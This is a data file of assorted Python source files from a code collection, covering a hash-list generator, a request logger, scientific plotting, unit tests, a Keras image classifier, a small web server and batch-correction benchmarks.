+{"seq_id":"32146625","text":"#!/usr/bin/python\n\"\"\"Create a blushlist file from the given input files and categories.\"\"\"\n# Usage: make_blushlist.py  \n\nimport sys, hashlib\ndef main():\n  \"\"\"Read all input files and output the blushlist file.\"\"\"\n  if len(sys.argv) < 4:\n    sys.exit(\"Usage: make_blushlist.py  { \"\n             \"}\")\n\n  f_out = open(sys.argv[1], \"w\")\n  f_out.write(\"// This file is automatically generated by make_blushlist.py\\n\")\n  f_out.write(\"let blushlist = {\\n\")\n  i = 2\n\n  hasher = hashlib.new('sha256')\n  version_hasher = hashlib.new('sha256')\n  # Process all of the files, one by one\n  while i < len(sys.argv):\n    try:\n      f_in = open(sys.argv[i], \"r\")\n    except IOError as ex:\n      sys.exit(\"Can't find file: %s\" % ex)\n    category = sys.argv[i + 1]\n    version_hasher.update(category)\n    for line in f_in.readlines():\n      line = line.strip().lower()\n      hasher.update(line)\n      f_out.write(\"  \\\"%s\\\" : \\\"%s\\\",\\n\" % (hasher.hexdigest()[:48], category))\n      hasher = hashlib.new('sha256')\n      version_hasher.update(line)\n    f_in.close()\n    i += 2\n\n  f_out.write(\"};\\n\")\n  f_out.write(\"module.exports.map = blushlist;\\n\")\n  f_out.write(\"module.exports.version = \\\"%s\\\";\\n\" % version_hasher.hexdigest())\n\n  f_out.close()\n\nif __name__ == \"__main__\":\n  main()\n","sub_path":"util/make_blushlist.py","file_name":"make_blushlist.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"440940963","text":"# coding=utf-8\n\nimport logging\nimport time\nfrom collections import namedtuple\n\nfrom frontik.request_context import RequestContext\n\nlogger = None  # for smooth transition from LoggerAdapter instances to the global logger\n\n_logger = logging.getLogger('frontik.handler')\n\n\nclass RequestLogger(logging.LoggerAdapter):\n\n    Stage = namedtuple('Stage', ('name', 'delta', 'start_delta'))\n\n    def __init__(self, request):\n        self._page_handler_name = None\n        self._last_stage_time = self._start_time = request._start_time\n        self.stages = []\n\n        super(RequestLogger, self).__init__(_logger, {})\n\n        # backcompatibility with logger\n        self.warn = self.warning\n\n    def stage_tag(self, stage_name):\n        stage_end_time = time.time()\n        stage_start_time = self._last_stage_time\n        self._last_stage_time = stage_end_time\n\n        delta = (stage_end_time - stage_start_time) * 1000\n        start_delta = (stage_start_time - self._start_time) * 1000\n        stage = RequestLogger.Stage(stage_name, delta, start_delta)\n\n        self.stages.append(stage)\n        self.debug('stage \"%s\" completed in %.2fms', stage.name, stage.delta, extra={'_stage': stage})\n\n    def get_current_total(self):\n        return sum(s.delta for s in self.stages)\n\n    def log_stages(self, status_code):\n        \"\"\"Writes available stages, total value and status code\"\"\"\n\n        stages_str = ' '.join('{s.name}={s.delta:.2f}'.format(s=s) for s in self.stages)\n        total = sum(s.delta for s in self.stages)\n\n        self.info(\n            'timings for %(page)s : %(stages)s',\n            {\n                'page': RequestContext.get('handler_name'),\n                'stages': '{0} total={1:.2f} code={2}'.format(stages_str, total, status_code)\n            },\n        )\n\n    def process(self, msg, kwargs):\n        if 'extra' in kwargs:\n            kwargs['extra'].update(self.extra)\n        else:\n            kwargs['extra'] = self.extra\n\n        return msg, kwargs\n","sub_path":"frontik/loggers/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"339351395","text":"from __future__ import division\nimport  matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n#import sys\nfrom os.path import expanduser\n\n\ndef xfrm(X, _max): return _max-np.array(X)\n\ndef figplot(dat, y, x, seed, xlab, ylab, fig, fit, disp, n):\n\n    fs = 8\n    if disp == 0: \n        sz = 0.1\n    else:\n        sz = 0.1\n    a = 1\n\n    e = max(seed)\n    dat = dat.tolist()\n    y = y.tolist()\n    \n    x = x.tolist()\n    seed = seed.tolist()\n\n    fig.add_subplot(2, 2, n)\n\n    clrs = []\n\n    for i, val in enumerate(dat):\n        sd = seed[i]    \n        clr = str()\n        if sd <= e*0.3: clr = 'red'\n        elif sd < e*0.4: clr = 'orange'\n        elif sd < e*0.5: clr = 'yellow'\n        elif sd < e*0.6: clr = 'lawngreen'\n        elif sd < e*0.7: clr = 'green'\n        elif sd < e*0.8: clr = 'deepskyblue'\n        elif sd < e*0.9: clr = 'blue'\n        else: clr = 'purple'\n        clrs.append(clr)\n\n    plt.scatter(x, y, s = sz, c=clrs, linewidths=0.0, alpha=a, edgecolor=None)\n    plt.xlabel(xlab, fontsize=fs+2)\n    plt.ylabel(ylab, fontsize=fs+2)\n    plt.tick_params(axis='both', labelsize=fs)\n    return fig\n\n\n\ndef figfunction(met1, met2, fname, disp, label):\n\n    ws, hs = 0.4, 0.4\n    mydir = expanduser(\"~/GitHub/DormancyDecay\")\n\n    fit = 1\n    df = pd.read_csv(mydir+'/model/ModelData/modelresults-numfit.txt')    \n    df = df[df['disperse'] == disp]\n    \n    df = df[df['fit'] == 1]\n    \n    fig = plt.figure()\n\n    if met2 == 'p_err': ylab = 'Percent error'\n    elif met2 == 'p_dif': ylab = 'Percent difference'\n    elif met2 == 'a_dif': ylab = 'Difference'\n\n    xlab = 'Environmental filtering'\n    \n    \n    if label == 'avg':\n        y = df[met1 + '_' + 'e_actslope' + '-' + met2]\n        labels2 = ['e_allslope','g_actslope','g_allslope']\n        for l in labels2:\n            y += df[met1 + '_' + l + '-' + met2]\n        y = y/4\n    else:\n        y = df[met1 + '_' + label + '-' + met2]\n        \n        \n    fig = figplot(df['fit'], y, df['env_r'], df['env_r'], xlab, ylab, fig, fit, disp, 1)\n\n    xlab = 'Dormant death'\n    fig = figplot(df['fit'], y, df['dded'], df['env_r'], xlab, ylab, fig, fit, disp, 2)\n\n    if disp == 1:\n        xlab = 'Active dispersal'\n        fig = figplot(df['fit'], y, df['ad_s'], df['env_r'], xlab, ylab, fig, fit, disp, 3)\n\n        xlab = 'Dormant dispersal'\n        fig = figplot(df['fit'], y, df['dd_s'], df['env_r'], xlab, ylab, fig, fit, disp, 4)\n        \n        \n    #### Final Format and Save #####################################################\n    plt.subplots_adjust(wspace=ws, hspace=hs)\n    \n    plt.savefig(mydir+'/figs/FromSims/temp/'+label+'/'+met1+'-'+met2+fname+'.png',\n        dpi=400, bbox_inches = \"tight\")\n    plt.close()\n\n\n    \n\nfor i in range(2):\n    mydir = expanduser(\"~/GitHub/DormancyDecay\")\n    df = pd.read_csv(mydir+'/model/ModelData/modelresults-numfit.txt')\n    df = df[df['disperse'] == i]\n    \n    tot = df.shape[0]\n    df = df[df['fit'] == 1]\n    fits = df.shape[0]\n    \n    if i == 0:\n        print('No dispersal:', 100*fits/tot)\n    elif i == 1:\n        print('Dispersal:', 100*fits/tot)\n        \n    print('AvgAct:', np.mean(df['avgAct']), 'AvgAll', np.mean(df['avgAll']))\n    print('Sact:', np.mean(df['Sact']), 'Sall:', np.mean(df['Sall']),'\\n')\n\n\n    \n\nfnames = ['_no-dispersal', '_dispersal']\ndisperse = [0, 1]\n\nmetrics1 = ['bray', 'sore', 'canb']\nmetrics2 = ['p_err']\n\nlabels = ['e_actslope','e_allslope','g_actslope','g_allslope','avg']\n#labels = ['avg']\nfor label in labels:\n    for i, fname in enumerate(fnames):\n        for met1 in metrics1:\n            for met2 in metrics2:\n        \n                disp = i\n                figfunction(met1, met2, fname, disp, label)\n","sub_path":"model/ModelComparisonScripts/ScatterFigs.py","file_name":"ScatterFigs.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"453122273","text":"#!/usr/bin/env python\n# encoding: utf-8\ntry:\n    from urllib import urlencode\nexcept ImportError:\n    from urllib.parse import urlencode\n\nfrom pyshorteners import Shortener, Shorteners\nfrom pyshorteners.shorteners import AwsmShortener\nfrom pyshorteners.exceptions import (ShorteningErrorException,\n                                     ExpandingErrorException)\n\nimport responses\nimport pytest\n\napi_key = 'FAKE_KEY'\ns = Shortener(Shorteners.AWSM, api_key=api_key, tool='abcde')\nshort_url = 'http://aw.sm/rjf0oI'\nexpanded = 'http://www.test.com'\n\n\n@responses.activate\ndef test_awsm_short_method():\n    # mock response\n    params = urlencode({\n        'url': expanded,\n        'key': api_key,\n        'channel': 'twitter',\n        'tool': 'abcde',\n        'v': 3\n    })\n    url = '{0}url.txt?{1}'.format(s.api_url, params)\n    responses.add(responses.POST, url, body=short_url, match_querystring=True)\n\n    shorten = s.short(expanded)\n    assert shorten == short_url\n\n\n@responses.activate\ndef test_awsm_short_method_bad_response():\n    url = '{}url.txt'.format(s.api_url)\n    responses.add(responses.POST, url, body=short_url, status=400)\n\n    with pytest.raises(ShorteningErrorException):\n        s.short(expanded)\n\n\n@responses.activate\ndef test_awsm_expand_method_bad_response():\n    responses.add(responses.GET, short_url, body='', status=400,\n                  match_querystring=True)\n\n    with pytest.raises(ExpandingErrorException):\n        s.expand(short_url)\n\n\ndef test_generate_tool_staticmethod():\n    tool = AwsmShortener._generate_random_tool()\n    assert len(tool) == 4\n\n\ndef test_bad_key():\n    s = Shortener(Shorteners.AWSM)\n\n    with pytest.raises(TypeError):\n        s.short(expanded)\n","sub_path":"tests/test_awsm.py","file_name":"test_awsm.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"486958311","text":"from settings import *\nimport os\n\n# Update database configuration with $DATABASE_URL.\nimport dj_database_url\ndb_from_env = dj_database_url.config()\nDATABASES['default'].update(db_from_env)\n\n\nPROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')\nSTATIC_URL = '/static/'\n\n\nSTATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'\n\nDEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\nAWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY']\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_KEY']\nAWS_STORAGE_BUCKET_NAME = os.environ['AWS_BUCKET']","sub_path":"cartotron/heroku.py","file_name":"heroku.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"293518402","text":"from collections import defaultdict\nimport sys\n\n\ndef hanoi(height, left='left', right='right', middle='middle'):\n    if height:\n        hanoi(height-1, left, middle, right)\n        topdisk = d[left].pop(-1)\n        d[right].append(topdisk)\n        print(\"\\n\")\n        print(left, \"=>\", right)\n        cols = ['left', 'middle', 'right']\n\n        print(str(dict(zip(cols, [d[col] for col in cols]))))\n        hanoi(height-1, middle, right, left)\n\n\nn = 3 if len(sys.argv) < 2 else int(sys.argv[1])\n\nd = defaultdict(list)\nd['left'] = list(range(1, n+1)[::-1])\nd['right'] = []\nd['middle'] = []\nhanoi(n)\n","sub_path":"100days_algorithm/day1_hanoitower.py","file_name":"day1_hanoitower.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"13770140","text":"import math\nimport emoji\n\nvNumber = float(input('Please give me a float number:'))\nprint(math.trunc(vNumber))\nprint(emoji.emojize('Python is :thumbs_up:'))\n\n# a2 = b2 + c2\n\nvB = float(input('Entre com o cateto 1: '))\nvC = float(input('Entre com o cateto 2: '))\n\nprint('O Valor da hipotenusa é: ', math.hypot(vB, vC))\n\nvAngulo = float(input('Entre com o ângulo: '))\n\nvSeno = math.sin(math.radians(vAngulo))\nvCosseno = math.cos(math.radians(vAngulo))\nvTangente = math.tan(math.radians(vAngulo))\n\nprint('O ângulo {} tem o Seno = {:.2f}, o Cosseno = {:.2f} e a Tangente = {:.2f}'.format(vAngulo, vSeno, vCosseno, vTangente))\n","sub_path":"Curso de Python - Youtube/desafio016.py","file_name":"desafio016.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"460319388","text":"\"\"\"Request logger views\"\"\"\nfrom django.views.generic.list import ListView\nfrom request_logger.models import RequestLogEntry\n\n\nclass RequestFirstLogRecordsView(ListView):\n    \"\"\"Renders requests log, showing first N requests\"\"\"\n    model = RequestLogEntry\n    template_name = 'request_log.html'\n    count = 10\n\n    def get_queryset(self):\n        queryset = super(RequestFirstLogRecordsView, self).get_queryset()\n        queryset = queryset.order_by('priority', 'request_datetime')\n        queryset = queryset[:self.count]\n        return queryset\n\n\nshow_log = RequestFirstLogRecordsView.as_view()\n","sub_path":"request_logger/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"451757631","text":"import GameObjects\nfrom Utils import Display\nimport cv2 as cv\n\nwidth = 30 \nheight = 20\nscale = 20  #Render scale factor\ndelay = 0   #cv.waitKey delay\ndi = Display.Display(delay,width,height,scale)\nb = GameObjects.Board(width = width, height = height)\n\nui = di.draw(b)\ndi.show(a=[ui])\n\ncv.destroyAllWindows()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"473239972","text":"import random\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Activation, Flatten, Dropout\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras.optimizers import SGD\nimport numpy as np\nimport sys\nfrom keras.preprocessing.image import ImageDataGenerator\nIMAGE_SIZE = 32\nNUM_ITER = 10\nBATCH_SIZE = 128\nNUM_CATEGORIES = 10\n\n\n# Extract data from pickle files\ndef unpickle(file):\n    import cPickle\n    fo = open(file, 'rb')\n    dict = cPickle.load(fo)\n    fo.close()\n    return dict\n\n\n# Reshape image data for pyplot\ndef process_image(img):\n    pixels = []\n    image = []\n\n    for i in range(IMAGE_SIZE*IMAGE_SIZE):\n        pixel = [img[i], img[i+(IMAGE_SIZE*IMAGE_SIZE)],\n                img[i+(IMAGE_SIZE*IMAGE_SIZE*2)]]\n        pixels += [pixel]\n\n    for i in range(IMAGE_SIZE):\n        row = []\n        for j in range(IMAGE_SIZE):\n            row += [pixels[(IMAGE_SIZE*i)+j]]\n        image += [row]\n\n    return image\n\n\n# check command line args for number of iterations\nif (len(sys.argv) > 1):\n    NUM_ITER = int(sys.argv[1])\n\n\n# Extract image data from cifar-10 files\nprint(\"Processing data...\")\ndata_1 = unpickle(\"cifar-10-batches-py/data_batch_1\")\ndata_2 = unpickle(\"cifar-10-batches-py/data_batch_2\")\ndata_3 = unpickle(\"cifar-10-batches-py/data_batch_3\")\ndata_4 = unpickle(\"cifar-10-batches-py/data_batch_4\")\ndata_5 = unpickle(\"cifar-10-batches-py/data_batch_5\")\ntest = unpickle(\"cifar-10-batches-py/test_batch\")\nmeta = unpickle(\"cifar-10-batches-py/batches.meta\")\n\n\n#combine datasets\ndata_all = np.vstack([data_1[\"data\"], data_2[\"data\"], data_3[\"data\"], data_4[\"data\"], data_5[\"data\"]])\nlabels_all = data_1[\"labels\"] + data_2[\"labels\"] + data_3[\"labels\"] + data_4[\"labels\"] + data_5[\"labels\"]\n\n\n# Process data for training\ntest_data = test[\"data\"]\ntest_labels = np_utils.to_categorical(np.array(test[\"labels\"]), NUM_CATEGORIES)\nlabels = np_utils.to_categorical(np.array(labels_all), NUM_CATEGORIES)\n\ndata_all = data_all.reshape(data_all.shape[0], 3, 32, 32)\ntest_data = test_data.reshape(test_data.shape[0], 3, 32, 32)\n\ndata_all = data_all.astype('float32')\ntest_data = test_data.astype('float32')\ndata_all /= 255\ntest_data /= 255\n\n\n# Define network\nprint(\"Generating model...\")\nmodel = Sequential()\n\nmodel.add(Convolution2D(32, 3, 3, border_mode=\"same\", input_shape=(3, 32, 32)))\nmodel.add(Activation(\"relu\"))\nmodel.add(Convolution2D(46, 3, 3))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(.3))\nmodel.add(Convolution2D(64, 3, 3, border_mode=\"same\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(.3))\nmodel.add(Flatten())\nmodel.add(Dense(500, input_dim=3072, init=\"glorot_uniform\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(Dense(10, init=\"glorot_uniform\"))\nmodel.add(Activation(\"softmax\"))\n\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"adadelta\", metrics=[\"accuracy\"])\n\n\n# Train network\nprint(\"Training...\")\n#model.fit(data_all, labels, nb_epoch=NUM_ITER, batch_size=BATCH_SIZE, shuffle=True)\n\nprint('Using real-time data augmentation.')\n\n# this will do preprocessing and realtime data augmentation\ndatagen = ImageDataGenerator(\n    featurewise_center=False,  # set input mean to 0 over the dataset\n    samplewise_center=False,  # set each sample mean to 0\n    featurewise_std_normalization=False,  # divide inputs by std of the dataset\n    samplewise_std_normalization=False,  # divide each input by its std\n    zca_whitening=False,  # apply ZCA whitening\n    rotation_range=0,  # randomly rotate images in the range (degrees, 0 to 180)\n    width_shift_range=0.1,  # randomly shift images horizontally (fraction of total width)\n    height_shift_range=0.1,  # randomly shift images vertically (fraction of total height)\n    horizontal_flip=True,  # randomly flip images\n    vertical_flip=False)  # randomly flip images\n\n# compute quantities required for featurewise normalization\n# (std, mean, and principal components if ZCA whitening is applied)\ndatagen.fit(data_all)\n\n# fit the model on the batches generated by datagen.flow()\nmodel.fit_generator(datagen.flow(data_all, labels,\n                    batch_size=BATCH_SIZE),\n                    samples_per_epoch=data_all.shape[0],\n                    nb_epoch=NUM_ITER,\n                        validation_data=(test_data, test_labels))\n\n# Test network\nresult = model.evaluate(test_data, test_labels, batch_size=BATCH_SIZE, show_accuracy=True, verbose=0, sample_weight=None)\nprint('Test score:', result[0])\nprint('Test accuracy:', result[1])\n\n\n# Predict results for test data\npredictions = model.predict_classes(test_data, batch_size=BATCH_SIZE, verbose=0)\n\n\n# Display 9 random results from test data\ntest_data = test_data.reshape(test_data.shape[0], 3072)\nfor i in range(9):\n    j = random.randint(0, 10000)\n    plt.subplot(3,3,i+1)\n\n    image = process_image(test_data[j])\n\n    plt.imshow(image, cmap='gray', interpolation='none')\n    plt.title(meta[\"label_names\"][test[\"labels\"][j]] + \" : \" + meta[\"label_names\"][predictions[j]])\nplt.show()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"576832683","text":"import socket\nimport multiprocessing\nimport re\nimport mini_frame\n\n\nclass WSGIServer(object):\n    def __init__(self):\n        # 创建套接字\n        self.tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        # 完成3次握手和4次挥手\n        self.tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        # 绑定\n        self.tcp_server_socket.bind((\"\", 7890))\n        # 监听\n        self.tcp_server_socket.listen(128)\n\n    # 客户端处理线程\n    def deal(self, client_socket):\n        request_content = client_socket.recv(1024).decode(\"utf-8\")\n        ret = re.match(r\"GET (/.*) HTTP/1.1\", request_content)\n        if ret:\n            # 得到()内的结果\n            title = ret.group(1)\n            # print(title)\n            if title == \"/\":\n                title = \"/index.html\"\n            if title.endswith(\".html\"):\n                self.response_static_content(client_socket, title)\n            else:\n                self.response_dynamic_content(client_socket, title)\n\n        client_socket.close()\n\n    # 静态响应处理\n    def response_static_content(self, client_socket, title):\n        # print(\"=========\")\n        # print(title)\n        try:\n            f = open(\"./html\" + title, 'rb')\n        except:\n            f = open(\"./html/404.html\", \"rb\")\n            content = f.read()\n            f.close()\n            client_socket.send(b\"HTTP/1.1 200 OK\\r\\n\" + b\"\\r\\n\" + content)\n        else:\n            content = f.read()\n            f.close()\n            client_socket.send(b\"HTTP/1.1 200 OK\\r\\n\" + b\"\\r\\n\" + content)\n\n    # 动态相应处理\n    def response_dynamic_content(self, client_socket, title):\n        header = \"HTTP/1.1 200 OK\\r\\n\"\n        header += \"\\r\\n\"\n        body = mini_frame.application(title)\n        response = header + body\n        client_socket.send(response.encode(\"utf-8\"))\n\n    def run_forever(self):\n        # 等待客户端链接\n        while True:\n            print(\"----------服务器已经运行-----------\")\n            client_socket, client_addr = self.tcp_server_socket.accept()\n            # 每链接一个客户端,开启一个进程\n            p = multiprocessing.Process(target=self.deal, args=(client_socket,))\n            p.start()\n            client_socket.close()\n        self.tcp_server_socket.close()\n\n\ndef main():\n    # 完成主要逻辑\n    server = WSGIServer()\n    server.run_forever()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Python_Basis_Code/26_mini-web/web_server.py","file_name":"web_server.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"297157727","text":"import numpy as np\nimport glob\nimport os\nimport pandas as pd\npath='/fs/project/PAS1263/src/models/research/object_detection/chairtable/Bndbox/train/'\ngtpath='/fs/project/PAS1263/data/ILSVRC/matconvnet_data/train.csv'\nchair=[];\ntable=[];\nwrongchair=[];\nwrongtable=[];\ndef intersection_over_union(boxA, boxB):\n\t# determine the (x, y)-coordinates of the intersection rectangle\n\txA = max(boxA[0], boxB[0])\n\tyA = max(boxA[1], boxB[1])\n\txB = min(boxA[2], boxB[2])\n\tyB = min(boxA[3], boxB[3])\n \n\t# compute the area of intersection rectangle\n\tinterArea = (xB - xA + 1) * (yB - yA + 1)\n \n\t# compute the area of both the prediction and ground-truth\n\t# rectangles\n\tboxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1]+ 1)\n\tboxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)\n \n\t# compute the intersection over union by taking the intersection\n\t# area and dividing it by the sum of prediction + ground-truth\n\t# areas - the interesection area\n\tiou = interArea / float(boxAArea + boxBArea - interArea)\n \n\t# return the intersection over union value\n\treturn iou\n\n\ndf1=pd.read_csv(gtpath)\ndf2=df1.set_index(\"filename\")    \nfor bndbox_path in glob.glob(path+'*.txt.npz'):\n    Data=np.load(bndbox_path)\n    position=Data['arr_0']\n    position=position[0]\n    prob=Data['arr_1']\n    prob=prob[0]\n    category=Data['arr_2']\n    category=category[0]\n    path,temp=os.path.split(bndbox_path)\n    file_name,rest1,rest2,rest3=temp.split(\".\")\n    if df1[df1['filename'].str.contains(file_name)==True].empty!=True:\n       temp=df2.loc[file_name,]\n       data=temp.as_matrix()\n       if data.ndim!=1:\n                for i in range(0,300):\n                    for j in range(0,data.shape[0]):\n                         boxA=[position[i,1],position[i,0],position[i,3],position[i,2]]\n                         boxB=[data[j,3]*1.0/data[j,0],data[j,5]*1.0/data[j,1],data[j,4]*1.0/data[j,0],data[j,6]*1.0/data[j,1]]\n                         if intersection_over_union(boxA, boxB)>0.5:\n                                if data[j,2]=='n03001627' and category[i]==1:\n                                     chair.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[j,2]=='n03001627' and category[i]!=1:\n                                     wrongchair.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[j,2]=='n04379243' and category[i]==2:\n                                     table.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[j,2]=='n04379243' and category[i]!=2:\n                                     wrongtable.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n       else:\n                 for i in range(0,300):\n                         boxA=[position[i,1],position[i,0],position[i,3],position[i,2]]\n                         boxB=[data[3]*1.0/data[0],data[5]*1.0/data[1],data[4]*1.0/data[0],data[6]*1.0/data[1]]\n                         if intersection_over_union(boxA, boxB)>0.5:\n                                if data[2]=='n03001627' and category[i]==1:\n                                     chair.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[2]=='n03001627' and category[i]!=1:\n                                     wrongchair.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[2]=='n04379243' and category[i]==2:\n                                     table.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n                                elif data[2]=='n04379243' and category[i]!=2:\n                                     wrongtable.append(abs(position[i,2]-position[i,0])*abs(position[i,3]-position[i,1]))\n\n\nnp.save('../prior/sizechair',chair)\nnp.save('../prior/sizetable',table)\nnp.save('../prior/wrongsizechair',wrongchair)\nnp.save('../prior/wrongsizetable',wrongtable)\n","sub_path":"faster-rcnn-base-model/code/sizekde.py","file_name":"sizekde.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"445390204","text":"import numpy as np\nimport pandas as pd\nimport pegasus as pg\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nimport os, sys, time, re\n\nfrom harmony import harmonize\nfrom harmonypy import run_harmony\nfrom anndata import AnnData\nfrom scipy.stats import pearsonr\nfrom scipy.sparse import csr_matrix\n\n\nmetric_dict = {'r': 'Correlation', 'L2': 'L2 Error'}\n\ndef check_metric(Z_torch, Z_py, Z_R, prefix, norm):\n    assert Z_torch.shape == Z_py.shape and Z_py.shape == Z_R.shape\n\n    metric_torch = []\n    for i in range(Z_torch.shape[1]):\n        m = get_measure(Z_torch[:, i], Z_R[:, i], norm)\n        metric_torch.append(m)\n\n    print(\"Mean {metric} by harmony-pytorch = {value:.4f}\".format(metric = metric_dict[norm], value = np.mean(metric_torch)))\n    np.savetxt(\"./result/{prefix}_{metric}_torch.txt\".format(prefix = prefix, metric = norm), metric_torch)\n\n    metric_py = []\n    for i in range(Z_py.shape[1]):\n        m = get_measure(Z_py[:, i], Z_R[:, i], norm)\n        metric_py.append(m)\n\n    print(\"Mean {metric} by harmonypy = {value:.4f}\".format(metric = metric_dict[norm], value = np.mean(metric_py)))\n    np.savetxt(\"./result/{prefix}_{metric}_py.txt\".format(prefix = prefix, metric = norm), metric_py)\n\n\ndef get_measure(x, base, norm):\n    assert norm in ['r', 'L2']\n\n    if norm == 'r':\n        corr, _ = pearsonr(x, base)\n        return corr\n    else:\n        return np.linalg.norm(x - base) / np.linalg.norm(base)\n\n\ndef plot_umap(adata, Z_torch, Z_py, Z_R, prefix, batch_key):\n    if adata is not None:\n        adata.obsm['X_torch'] = Z_torch\n        adata.obsm['X_py'] = Z_py\n        adata.obsm['X_harmony'] = Z_R\n\n        pg.neighbors(adata, rep = 'torch')\n        pg.umap(adata, rep = 'torch', out_basis = 'umap_torch')\n\n        pg.neighbors(adata, rep = 'py')\n        pg.umap(adata, rep = 'py', out_basis = 'umap_py')\n\n        pg.neighbors(adata, rep = 'harmony')\n        pg.umap(adata, rep = 'harmony', out_basis = 'umap_harmony')\n\n        pg.write_output(adata, \"./result/{}_result\".format(prefix))\n    else:\n        print(\"Use precalculated AnnData result.\")\n\n    if os.system(\"pegasus plot scatter --basis umap --attributes {attr} --alpha 0.5 ./result/{name}_result.h5ad ./plots/{name}.before.umap.pdf\".format(name = prefix, attr = batch_key)):\n        sys.exit(1)\n\n    if os.system(\"pegasus plot scatter --basis umap_torch --attributes {attr} --alpha 0.5 ./result/{name}_result.h5ad ./plots/{name}.torch.umap.pdf\".format(name = prefix, attr = batch_key)):\n        sys.exit(1)\n\n    if os.system(\"pegasus plot scatter --basis umap_py --attributes {attr} --alpha 0.5 ./result/{name}_result.h5ad ./plots/{name}.py.umap.pdf\".format(name = prefix, attr = batch_key)):\n        sys.exit(1)\n\n    if os.system(\"pegasus plot scatter --basis umap_harmony --attributes {attr} --alpha 0.5 ./result/{name}_result.h5ad ./plots/{name}.harmony.umap.pdf\".format(name = prefix, attr = batch_key)):\n        sys.exit(1)\n\n\ndef test_cell_lines():\n    print(\"Testing on cell lines dataset...\")\n\n    z_files = [f for f in os.listdir(\"./result\") if re.match(\"cell_lines.*_z.(txt|npy)\", f)]\n    if len(z_files) < 3 or not os.path.exists(\"./result/cell_lines_result.h5ad\"):\n        X = np.loadtxt(\"./data/cell_lines/pca.txt\")\n        df_metadata = pd.read_csv(\"./data/cell_lines/metadata.csv\")\n        source_loaded = True\n\n    if os.path.exists(\"./result/cell_lines_torch_z.npy\"):\n        Z_torch = np.load(\"./result/cell_lines_torch_z.npy\")\n        print(\"Precalculated embedding by harmony-pytorch is loaded.\")\n    else:\n        start_torch = time.time()\n        Z_torch = harmonize(X, df_metadata, batch_key = 'dataset')\n        end_torch = time.time()\n\n        print(\"Time spent for harmony-pytorch = {:.2f}s.\".format(end_torch - start_torch))\n        np.save(\"./result/cell_lines_torch_z.npy\", Z_torch)\n\n    if os.path.exists(\"./result/cell_lines_py_z.npy\"):\n        Z_py = np.load(\"./result/cell_lines_py_z.npy\")\n        print(\"Precalculated embedding by harmonypy is loaded.\")\n    else:\n        start_py = time.time()\n        ho = run_harmony(X, df_metadata, ['dataset'])\n        end_py = time.time()\n\n        print(\"Time spent for harmonypy = {:.2f}s.\".format(end_py - start_py))\n        print(ho.objective_harmony)\n\n        Z_py = np.transpose(ho.Z_corr)\n        np.save(\"./result/cell_lines_py_z.npy\", Z_py)\n\n    Z_R = np.loadtxt(\"./result/cell_lines_harmony_z.txt\")\n\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"cell_lines\", norm = 'r')\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"cell_lines\", norm = 'L2')\n\n  